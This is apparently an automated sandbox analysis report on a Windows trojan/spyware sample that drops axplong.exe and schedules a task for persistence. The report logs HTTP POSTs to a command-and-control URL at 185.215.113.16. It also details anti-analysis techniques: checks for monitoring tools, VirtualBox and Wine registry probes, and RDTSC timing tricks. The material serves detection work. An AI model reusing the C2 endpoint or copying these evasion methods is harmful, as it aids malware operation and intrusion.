                    Source: unknownDNS traffic detected: query: 15.164.165.52.in-addr.arpa replaycode: Name error (3)
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002BBD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,6_2_002BBD60
                    Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                    Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php/
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php=
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpD
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpE
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpI
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpJ
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpX
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpY
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.2980255678.0000000000E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpi
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedV
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedn
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpq
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpy
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpy1mb3JtLXVybGVuY29kZWQ=
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpz

                    System Summary

                    barindex
                    PE file contains section with special chars
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002F30686_2_002F3068
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002BE4406_2_002BE440
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002B4CF06_2_002B4CF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002E7D836_2_002E7D83
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002F765B6_2_002F765B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002B4AF06_2_002B4AF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002F87206_2_002F8720
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002F6F096_2_002F6F09
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002F777B6_2_002F777B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002F2BD06_2_002F2BD0
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9974242166212534
                    Source: file.exeStatic PE information: Section: mtnloani ZLIB complexity 0.994482129491018
                    Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9974242166212534
                    Source: axplong.exe.0.drStatic PE information: Section: mtnloani ZLIB complexity 0.994482129491018
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@1/1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeReversingLabs: Detection: 52%
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: file.exeStatic file information: File size 1913344 > 1048576
                    Source: file.exeStatic PE information: Raw size of mtnloani is bigger than: 0x100000 < 0x1a1800

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.500000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mtnloani:EW;bcuuovzp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mtnloani:EW;bcuuovzp:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 1.2.axplong.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mtnloani:EW;bcuuovzp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mtnloani:EW;bcuuovzp:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 2.2.axplong.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mtnloani:EW;bcuuovzp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mtnloani:EW;bcuuovzp:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 6.2.axplong.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mtnloani:EW;bcuuovzp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mtnloani:EW;bcuuovzp:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: axplong.exe.0.drStatic PE information: real checksum: 0x1d3bff should be: 0x1d8807
                    Source: file.exeStatic PE information: real checksum: 0x1d3bff should be: 0x1d8807
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: mtnloani
                    Source: file.exeStatic PE information: section name: bcuuovzp
                    Source: file.exeStatic PE information: section name: .taggant
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: mtnloani
                    Source: axplong.exe.0.drStatic PE information: section name: bcuuovzp
                    Source: axplong.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002CD84C push ecx; ret 6_2_002CD85F
                    Source: file.exeStatic PE information: section name: entropy: 7.981756657229513
                    Source: file.exeStatic PE information: section name: mtnloani entropy: 7.954149945480765
                    Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.981756657229513
                    Source: axplong.exe.0.drStatic PE information: section name: mtnloani entropy: 7.954149945480765
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file

                    Boot Survival

                    barindex
                    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Tries to detect sandboxes / dynamic malware analysis system (registry check)
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Tries to detect virtualization through RDTSC time measurements
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56EB3D second address: 56EB47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F488C756CF6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56EB47 second address: 56EB4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E46FB second address: 6E4716 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D07h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4DD9 second address: 6E4DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4DDF second address: 6E4DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4DE3 second address: 6E4E33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045403h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F488D045407h 0x00000011 pop eax 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jmp 00007F488D0453FCh 0x0000001a pushad 0x0000001b jnl 00007F488D0453F6h 0x00000021 jc 00007F488D0453F6h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E84BF second address: 6E84C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E84C3 second address: 6E84D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E84D6 second address: 6E84FC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F488C756CFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F488C756CFBh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E84FC second address: 6E8587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov di, 81A1h 0x0000000c push 00000003h 0x0000000e push ebx 0x0000000f jmp 00007F488D045404h 0x00000014 pop ecx 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 js 00007F488D045401h 0x0000001e jmp 00007F488D0453FBh 0x00000023 pop edx 0x00000024 push 00000003h 0x00000026 jmp 00007F488D045408h 0x0000002b call 00007F488D0453F9h 0x00000030 jl 00007F488D045411h 0x00000036 pushad 0x00000037 jmp 00007F488D0453FBh 0x0000003c jmp 00007F488D0453FEh 0x00000041 popad 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F488D0453FBh 0x0000004a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8587 second address: 6E8598 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
